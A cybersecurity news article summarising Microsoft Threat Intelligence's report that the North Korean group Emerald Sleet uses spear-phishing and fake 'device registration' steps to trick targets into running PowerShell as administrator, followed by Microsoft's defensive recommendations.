Hackers Manipulate Users Into Running PowerShell as Admin to Exploit Windows

Microsoft Threat Intelligence has exposed a novel cyberattack method employed by the North Korean state-sponsored hacking group, Emerald Sleet (also known as Kimsuky or VELVET CHOLLIMA).

The group is exploiting social engineering tactics to deceive individuals into running PowerShell commands with administrative privileges, allowing them to infiltrate systems and pilfer critical information.

Emerald Sleet’s new strategy involves impersonating South Korean government officials to build trust with their victims.

Once the targets are sufficiently duped, the attackers send spear-phishing emails containing PDF attachments.

These documents instruct recipients to click a URL for “device registration” to access the content.

The so-called registration process is sinister in its simplicity. Victims are directed to open PowerShell as administrators and input a provided code.

According to a Microsoft post in X, the PowerShell code downloads malicious tools, including a browser-based remote desktop application and a certificate file with a hardcoded PIN, from a remote server.

Device Registration

When the code is executed, it registers the victim’s device with the attackers’ remote server using the certificate and PIN.

This access enables Emerald Sleet to exploit the compromised systems, engaging in espionage and data theft.

As per the Cyber Security News report, Microsoft notes that this attack method has been observed in limited cases since January 2025, reflecting a calculated evolution in Emerald Sleet’s approach.

The group’s primary targets include individuals in international affairs, especially those linked to Northeast Asia, as well as NGOs, government agencies, media outlets, and other organizations spanning North America, South America, Europe, and East Asia.

Emerald Sleet’s objectives are believed to focus heavily on traditional espionage activities.

Microsoft has been proactive in notifying affected individuals and organizations. Its Defender XDR platform can detect and mitigate this threat. To combat such attacks, Microsoft has advised organizations to:

• Adopt advanced anti-phishing solutions to block malicious emails.
• Educate employees on how to identify phishing attempts and avoid suspicious links.
• Implement attack surface reduction rules to block common techniques, including malicious scripts.

This cyberattack highlights the importance of staying vigilant against evolving threats. Emerald Sleet’s manipulation of administrative PowerShell commands underscores how attackers continue to refine their methods to exploit human and technical vulnerabilities.

Organizations and individuals involved in sensitive international matters must prioritize robust cybersecurity measures to protect against such sophisticated campaigns.

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free